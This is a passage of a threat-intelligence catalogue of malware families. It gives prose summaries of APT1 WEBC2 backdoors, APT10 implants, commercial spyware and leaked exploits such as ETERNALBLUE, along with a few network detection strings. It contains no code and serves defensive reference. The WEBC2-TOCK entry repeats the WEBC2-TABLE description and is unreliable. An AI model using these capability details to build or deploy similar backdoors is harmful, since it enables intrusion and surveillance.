<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html">http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_webc2_greencat"><a class="anchor" href="#_webc2_greencat"></a><a class="link" href="#_webc2_greencat">WEBC2-GREENCAT</a></h3>
<div class="paragraph">
<p>A WEBC2 backdoor is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. This malware is a variant on the GREENCAT family, using a fixed web C2. This family is a full featured backdoor which provides remote command execution, file transfer, process and service enumeration and manipulation. It installs itself persistently through the current user&#8217;s registry Run key.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2724. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html">http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_webc2_head"><a class="anchor" href="#_webc2_head"></a><a class="link" href="#_webc2_head">WEBC2-HEAD</a></h3>
<div class="paragraph">
<p>The WEBC2 malware family is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. The WEBC2-HEAD variant communicates over HTTPS, using the system&#8217;s SSL implementation to encrypt all communications with the C2 server. WEBC2-HEAD first issues an HTTP GET to the host, sending the Base64-encoded string containing the name of the compromised machine running the malware.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2725. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html">http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_webc2_kt3"><a class="anchor" href="#_webc2_kt3"></a><a class="link" href="#_webc2_kt3">WEBC2-KT3</a></h3>
<div class="paragraph">
<p>The WEBC2 malware family is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. The WEBC2-KT3 variant searches for commands in a specific comment tag. Network traffic starting with *!Kt3+v| may indicate WEBC2-KT3 activity.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2726. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html">http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_webc2_qbp"><a class="anchor" href="#_webc2_qbp"></a><a class="link" href="#_webc2_qbp">WEBC2-QBP</a></h3>
<div class="paragraph">
<p>The WEBC2 malware family is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. The WEBC2-QBP variant will search for two strings in a HTML comment. The first will be "2010QBP " followed by " 2010QBP//--". Inside these tags will be a DES-encrypted string.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2727. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html">http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_webc2_rave"><a class="anchor" href="#_webc2_rave"></a><a class="link" href="#_webc2_rave">WEBC2-RAVE</a></h3>
<div class="paragraph">
<p>A WEBC2 backdoor is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. This family of malware will set itself up as a service and connect out to a hardcoded web page and read a modified base64 string from this webpage. The later versions of this malware supports three commands (earlier ones are just downloaders or reverse shells). The first commands will sleep the malware for N number of hours. The second command will download a binary from the encoded HTML comment and execute it on the infected host. The third will spawn an encoded reverse shell to an attacker specified location and port.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2728. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html">http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_webc2_table"><a class="anchor" href="#_webc2_table"></a><a class="link" href="#_webc2_table">WEBC2-TABLE</a></h3>
<div class="paragraph">
<p>The WEBC2 malware family is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. The WEBC2-TABLE variant looks for web pages containing 'background', 'align', and 'bgcolor' tags to be present in the requested Web page. If the data in these tags are formatted correctly, the malware will decode a second URL and a filename. This URL is then retrieved, written to the decoded filename and executed.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2729. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html">http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_webc2_tock"><a class="anchor" href="#_webc2_tock"></a><a class="link" href="#_webc2_tock">WEBC2-TOCK</a></h3>
<div class="paragraph">
<p>The WEBC2 malware family is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. The WEBC2-TABLE variant looks for web pages containing 'background', 'align', and 'bgcolor' tags to be present in the requested Web page. If the data in these tags are formatted correctly, the malware will decode a second URL and a filename. This URL is then retrieved, written to the decoded filename and executed.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2730. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html">http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_webc2_ugx"><a class="anchor" href="#_webc2_ugx"></a><a class="link" href="#_webc2_ugx">WEBC2-UGX</a></h3>
<div class="paragraph">
<p>A WEBC2 backdoor is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. Members of this family of malware provide remote command shell and remote file download and execution capabilities. The malware downloads a web page containing a crafted HTML comment that subsequently contains an encoded command. The contents of this command tell the malware whether to download and execute a program, launch a reverse shell to a specific host and port number, or to sleep for a period of time.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2731. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html">http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_webc2_y21k"><a class="anchor" href="#_webc2_y21k"></a><a class="link" href="#_webc2_y21k">WEBC2-Y21K</a></h3>
<div class="paragraph">
<p>A WEBC2 backdoor is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. Members of this family of backdoor malware talk to specific Web-based Command &amp; Control (C2) servers. The backdoor has a limited command set, depending on version. It is primarily a downloader, but it classified as a backdoor because it can accept a limited command set, including changing local directories, downloading and executing additional files, sleeping, and connecting to a specific IP &amp; port not initially included in the instruction set for the malware. Each version of the malware has at least one hardcoded URL to which it connects to receive its initial commands. This family of malware installs itself as a service, with the malware either being the executable run by the service, or the service DLL loaded by a legitimate service. The same core code is seen recompiled on different dates or with different names, but the same functionality. Key signatures include a specific set of functions (some of which can be used with the OS-provided rundll32.exe tool to install the malware as a service), and hardcoded strings used in communication with C2 servers to issue commands to the implant.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2732. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html">http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_webc2_yahoo"><a class="anchor" href="#_webc2_yahoo"></a><a class="link" href="#_webc2_yahoo">WEBC2-YAHOO</a></h3>
<div class="paragraph">
<p>The WEBC2 malware family is designed to retrieve a Web page from a pre-determined C2 server. It expects the Web page to contain special HTML tags; the backdoor will attempt to interpret the data between the tags as commands. The WEBC2-YAHOO variant enters a loop where every ten minutes it attempts to download a web page that may contain an encoded URL. The encoded URL will be found in the pages returned inside an attribute named 'sb' or 'ex' within a tag named 'yahoo'. The embedded link can direct the malware to download and execute files.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2733. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html">http://contagiodump.blogspot.lu/2013/03/mandiant-apt1-samples-categorized-by.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_haymaker"><a class="anchor" href="#_haymaker"></a><a class="link" href="#_haymaker">HAYMAKER</a></h3>
<div class="paragraph">
<p>HAYMAKER is a backdoor that can download and execute additional payloads in the form of modules. It also conducts basic victim profiling activity, collecting the computer name, running process IDs, %TEMP% directory path and version of Internet Explorer. It communicates encoded system information to a single hard coded command and control (C2) server, using the systems default User-Agent string.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2734. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html">https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_bugjuice"><a class="anchor" href="#_bugjuice"></a><a class="link" href="#_bugjuice">BUGJUICE</a></h3>
<div class="paragraph">
<p>BUGJUICE is a backdoor that is executed by launching a benign file and then hijacking the search order to load a malicious dll into it. That malicious dll then loads encrypted shellcode from the binary, which is decrypted and runs the final BUGJUICE payload. BUGJUICE defaults to TCP using a custom binary protocol to communicate with the C2, but can also use HTTP and HTTPs if directed by the C2. It has the capability to find files, enumerate drives, exfiltrate data, take screenshots and provide a reverse shell.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2735. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html">https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_snugride_2"><a class="anchor" href="#_snugride_2"></a><a class="link" href="#_snugride_2">SNUGRIDE</a></h3>
<div class="paragraph">
<p>SNUGRIDE is a backdoor that communicates with its C2 server through HTTP requests. Messages are encrypted using AES with a static key. The malwares capabilities include taking a system survey, access to the filesystem, executing commands and a reverse shell. Persistence is maintained through a Run registry key.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2736. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html">https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_quasarrat"><a class="anchor" href="#_quasarrat"></a><a class="link" href="#_quasarrat">QUASARRAT</a></h3>
<div class="paragraph">
<p>QUASARRAT is an open-source RAT available at <a href="https://github.com/quasar/QuasarRat" class="bare">https://github.com/quasar/QuasarRat</a> . The versions used by APT10 (1.3.4.0, 2.0.0.0, and 2.0.0.1) are not available via the public GitHub page, indicating that APT10 has further customized the open source version. The 2.0 versions require a dropper to decipher and launch the AES encrypted QUASARRAT payload. QUASARRAT is a fully functional .NET backdoor that has been used by multiple cyber espionage groups in the past.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2737. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html">https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_da_vinci_rcs"><a class="anchor" href="#_da_vinci_rcs"></a><a class="link" href="#_da_vinci_rcs">da Vinci RCS</a></h3>
<div class="paragraph">
<p>Hacking Teams "DaVinci" Remote Control System is able, the company says, to break encryption and allow law enforcement agencies to monitor encrypted files and emails (even ones encrypted with PGP), Skype and other Voice over IP or chat communication. It allows identification of the targets location and relationships. It can also remotely activate microphones and cameras on a computer and works worldwide. Hacking Team claims that its software is able to monitor hundreds of thousands of computers at once, all over the country. Trojans are available for Windows, Mac, Linux, iOS, Android, Symbian and Blackberry.</p>
</div>
<div class="paragraph">
<p>da Vinci RCS is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>DaVinci</p>
</li>
<li>
<p>Morcut</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2738. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://surveillance.rsf.org/en/hacking-team/">http://surveillance.rsf.org/en/hacking-team/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://wikileaks.org/hackingteam/emails/fileid/581640/267803">https://wikileaks.org/hackingteam/emails/fileid/581640/267803</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://wikileaks.org/hackingteam/emails/emailid/31436">https://wikileaks.org/hackingteam/emails/emailid/31436</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_latentbot"><a class="anchor" href="#_latentbot"></a><a class="link" href="#_latentbot">LATENTBOT</a></h3>
<div class="paragraph">
<p>LATENTBOT, a new, highly obfuscated BOT that has been in the wild since mid-2013. It has managed to leave hardly any traces on the Internet, is capable of watching its victims without ever being noticed, and can even corrupt a hard disk, thus making a PC useless.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2739. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2015/12/latentbot_trace_me.html">https://www.fireeye.com/blog/threat-research/2015/12/latentbot_trace_me.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199_useda.html">https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199_useda.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_finspy_2"><a class="anchor" href="#_finspy_2"></a><a class="link" href="#_finspy_2">FINSPY</a></h3>
<div class="paragraph">
<p>Though we have not identified the targets, FINSPY is sold by Gamma Group to multiple nation-state clients, and we assess with moderate confidence that it was being used along with the zero-day to carry out cyber espionage.</p>
</div>
<div class="paragraph">
<p>FINSPY is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>BlackOasis</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2740. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199_useda.html">https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199_useda.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_rcs_galileo"><a class="anchor" href="#_rcs_galileo"></a><a class="link" href="#_rcs_galileo">RCS Galileo</a></h3>
<div class="paragraph">
<p>HackingTeam Remote Control System (RCS) Galileo hacking platform</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2741. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.f-secure.com/documents/996508/1030745/callisto-group">https://www.f-secure.com/documents/996508/1030745/callisto-group</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_earlyshovel"><a class="anchor" href="#_earlyshovel"></a><a class="link" href="#_earlyshovel">EARLYSHOVEL</a></h3>
<div class="paragraph">
<p>RedHat 7.0 - 7.1 Sendmail 8.11.x exploit</p>
</div>
</div>
<div class="sect2">
<h3 id="_ebbisland_ebbshave"><a class="anchor" href="#_ebbisland_ebbshave"></a><a class="link" href="#_ebbisland_ebbshave">EBBISLAND (EBBSHAVE)</a></h3>
<div class="paragraph">
<p>root RCE via RPC XDR overflow in Solaris 6, 7, 8, 9 &amp; 10 (possibly newer) both SPARC and x86</p>
</div>
</div>
<div class="sect2">
<h3 id="_echowrecker"><a class="anchor" href="#_echowrecker"></a><a class="link" href="#_echowrecker">ECHOWRECKER</a></h3>
<div class="paragraph">
<p>remote Samba 3.0.x Linux exploit</p>
</div>
</div>
<div class="sect2">
<h3 id="_easybee"><a class="anchor" href="#_easybee"></a><a class="link" href="#_easybee">EASYBEE</a></h3>
<div class="paragraph">
<p>appears to be an MDaemon email server vulnerability</p>
</div>
</div>
<div class="sect2">
<h3 id="_easypi"><a class="anchor" href="#_easypi"></a><a class="link" href="#_easypi">EASYPI</a></h3>
<div class="paragraph">
<p>an IBM Lotus Notes exploit that gets detected as Stuxnet</p>
</div>
</div>
<div class="sect2">
<h3 id="_ewokfrenzy"><a class="anchor" href="#_ewokfrenzy"></a><a class="link" href="#_ewokfrenzy">EWOKFRENZY</a></h3>
<div class="paragraph">
<p>an exploit for IBM Lotus Domino 6.5.4 &amp; 7.0.2</p>
</div>
</div>
<div class="sect2">
<h3 id="_explodingcan"><a class="anchor" href="#_explodingcan"></a><a class="link" href="#_explodingcan">EXPLODINGCAN</a></h3>
<div class="paragraph">
<p>an IIS 6.0 exploit that creates a remote backdoor</p>
</div>
</div>
<div class="sect2">
<h3 id="_eternalromance"><a class="anchor" href="#_eternalromance"></a><a class="link" href="#_eternalromance">ETERNALROMANCE</a></h3>
<div class="paragraph">
<p>a SMB1 exploit over TCP port 445 which targets XP, 2003, Vista, 7, Windows 8, 2008, 2008 R2, and gives SYSTEM privileges (MS17-010)</p>
</div>
</div>
<div class="sect2">
<h3 id="_educatedscholar"><a class="anchor" href="#_educatedscholar"></a><a class="link" href="#_educatedscholar">EDUCATEDSCHOLAR</a></h3>
<div class="paragraph">
<p>a SMB exploit (MS09-050)</p>
</div>
</div>
<div class="sect2">
<h3 id="_emeraldthread"><a class="anchor" href="#_emeraldthread"></a><a class="link" href="#_emeraldthread">EMERALDTHREAD</a></h3>
<div class="paragraph">
<p>a SMB exploit for Windows XP and Server 2003 (MS10-061)</p>
</div>
</div>
<div class="sect2">
<h3 id="_emphasismine"><a class="anchor" href="#_emphasismine"></a><a class="link" href="#_emphasismine">EMPHASISMINE</a></h3>
<div class="paragraph">
<p>a remote IMAP exploit for IBM Lotus Domino 6.6.4 to 8.5.2</p>
</div>
</div>
<div class="sect2">
<h3 id="_englishmansdentist"><a class="anchor" href="#_englishmansdentist"></a><a class="link" href="#_englishmansdentist">ENGLISHMANSDENTIST</a></h3>
<div class="paragraph">
<p>Outlook Exchange WebAccess rules to trigger executable code on the client&#8217;s side to send an email to other users</p>
</div>
</div>
<div class="sect2">
<h3 id="_epichero"><a class="anchor" href="#_epichero"></a><a class="link" href="#_epichero">EPICHERO</a></h3>
<div class="paragraph">
<p>0-day exploit (RCE) for Avaya Call Server</p>
</div>
</div>
<div class="sect2">
<h3 id="_erraticgopher"><a class="anchor" href="#_erraticgopher"></a><a class="link" href="#_erraticgopher">ERRATICGOPHER</a></h3>
<div class="paragraph">
<p>SMBv1 exploit targeting Windows XP and Server 2003</p>
</div>
</div>
<div class="sect2">
<h3 id="_eternalsynergy"><a class="anchor" href="#_eternalsynergy"></a><a class="link" href="#_eternalsynergy">ETERNALSYNERGY</a></h3>
<div class="paragraph">
<p>a SMBv3 remote code execution flaw for Windows 8 and Server 2012 SP0 (MS17-010)</p>
</div>
</div>
<div class="sect2">
<h3 id="_eternalblue"><a class="anchor" href="#_eternalblue"></a><a class="link" href="#_eternalblue">ETERNALBLUE</a></h3>
<div class="paragraph">
<p>SMBv2 exploit for Windows 7 SP1 (MS17-010)</p>
</div>
</div>
<div class="sect2">
<h3 id="_eternalchampion"><a class="anchor" href="#_eternalchampion"></a><a class="link" href="#_eternalchampion">ETERNALCHAMPION</a></h3>
<div class="paragraph">
<p>a SMBv1 exploit</p>
</div>
</div>
<div class="sect2">
<h3 id="_eskimoroll"><a class="anchor" href="#_eskimoroll"></a><a class="link" href="#_eskimoroll">ESKIMOROLL</a></h3>
<div class="paragraph">
<p>Kerberos exploit targeting 2000, 2003, 2008 and 2008 R2 domain controllers</p>
</div>
</div>
<div class="sect2">
<h3 id="_esteemaudit"><a class="anchor" href="#_esteemaudit"></a><a class="link" href="#_esteemaudit">ESTEEMAUDIT</a></h3>
<div class="paragraph">
<p>RDP exploit and backdoor for Windows Server 2003</p>
</div>
</div>
<div class="sect2">
<h3 id="_eclipsedwing"><a class="anchor" href="#_eclipsedwing"></a><a class="link" href="#_eclipsedwing">ECLIPSEDWING</a></h3>
<div class="paragraph">
<p>RCE exploit for the Server service in Windows Server 2008 and later (MS08-067)</p>
</div>
</div>
<div class="sect2">
<h3 id="_etre"><a class="anchor" href="#_etre"></a><a class="link" href="#_etre">ETRE</a></h3>
<div class="paragraph">
<p>exploit for IMail 8.10 to 8.22</p>
</div>
</div>
<div class="sect2">
<h3 id="_fuzzbunch"><a class="anchor" href="#_fuzzbunch"></a><a class="link" href="#_fuzzbunch">FUZZBUNCH</a></h3>
<div class="paragraph">
<p>an exploit framework, similar to MetaSploit</p>
</div>
</div>
<div class="sect2">
<h3 id="_oddjob"><a class="anchor" href="#_oddjob"></a><a class="link" href="#_oddjob">ODDJOB</a></h3>
<div class="paragraph">
<p>implant builder and C&amp;C server that can deliver exploits for Windows 2000 and later, also not detected by any AV vendors</p>
</div>
</div>
<div class="sect2">
<h3 id="_passfreely"><a class="anchor" href="#_passfreely"></a><a class="link" href="#_passfreely">PASSFREELY</a></h3>
<div class="paragraph">
<p>utility which Bypasses authentication for Oracle servers</p>
</div>
</div>
<div class="sect2">
<h3 id="_smbtouch"><a class="anchor" href="#_smbtouch"></a><a class="link" href="#_smbtouch">SMBTOUCH</a></h3>
<div class="paragraph">
<p>check if the target is vulnerable to samba exploits like ETERNALSYNERGY, ETERNALBLUE, ETERNALROMANCE</p>
</div>
</div>
<div class="sect2">
<h3 id="_erraticgophertouch"><a class="anchor" href="#_erraticgophertouch"></a><a class="link" href="#_erraticgophertouch">ERRATICGOPHERTOUCH</a></h3>
<div class="paragraph">
<p>Check if the target is running some RPC</p>
</div>
</div>
<div class="sect2">
<h3 id="_iistouch"><a class="anchor" href="#_iistouch"></a><a class="link" href="#_iistouch">IISTOUCH</a></h3>
<div class="paragraph">
<p>check if the running IIS version is vulnerable</p>
</div>
</div>
<div class="sect2">
<h3 id="_rpcoutch"><a class="anchor" href="#_rpcoutch"></a><a class="link" href="#_rpcoutch">RPCOUTCH</a></h3>
<div class="paragraph">
<p>get info about windows via RPC</p>
</div>
</div>
<div class="sect2">
<h3 id="_dopu"><a class="anchor" href="#_dopu"></a><a class="link" href="#_dopu">DOPU</a></h3>
<div class="paragraph">
<p>used to connect to machines exploited by ETERNALCHAMPIONS</p>
</div>
</div>
<div class="sect2">
<h3 id="_flexspy"><a class="anchor" href="#_flexspy"></a><a class="link" href="#_flexspy">FlexSpy</a></h3>
<div class="paragraph">
<p>covert surveillance tools</p>
</div>
</div>
<div class="sect2">
<h3 id="_feodo_2"><a class="anchor" href="#_feodo_2"></a><a class="link" href="#_feodo_2">feodo</a></h3>
<div class="paragraph">
<p>Unfortunately, it is time to meet 'Feodo'. Since august of this year when FireEye&#8217;s MPS devices detected this malware in the field, we have been monitoring this banking trojan very closely. In many ways, this malware looks similar to other famous banking trojans like Zbot and SpyEye. Although my analysis says that this malware is not a toolkit and is in the hands of a single criminal group.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2742. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2010/10/feodosoff-a-new-botnet-on-the-rise.html">https://www.fireeye.com/blog/threat-research/2010/10/feodosoff-a-new-botnet-on-the-rise.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cardinal_rat"><a class="anchor" href="#_cardinal_rat"></a><a class="link" href="#_cardinal_rat">Cardinal RAT</a></h3>
<div class="paragraph">
<p>Palo Alto Networks has discovered a previously unknown remote access Trojan (RAT) that has been active for over two years. It has a very low volume in this two-year period, totaling roughly 27 total samples. The malware is delivered via an innovative and unique technique: a downloader we are calling Carp uses malicious macros in Microsoft Excel documents to compile embedded C# (C Sharp) Programming Language source code into an executable that in turn is run to deploy the Cardinal RAT malware family. These malicious Excel files use a number of different lures, providing evidence of what attackers are using to entice victims into executing them.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2743. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2017/04/unit42-cardinal-rat-active-two-years/">http://researchcenter.paloaltonetworks.com/2017/04/unit42-cardinal-rat-active-two-years/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_redleaves_3"><a class="anchor" href="#_redleaves_3"></a><a class="link" href="#_redleaves_3">REDLEAVES</a></h3>
<div class="paragraph">
<p>The REDLEAVES implant consists of three parts: an executable, a loader, and the implant shellcode. The REDLEAVES implant is a remote administration Trojan (RAT) that is built in Visual C++ and makes heavy use of thread generation during its execution. The implant contains a number of functions typical of RATs, including system enumeration and creating a remote shell back to the C2.</p>
</div>
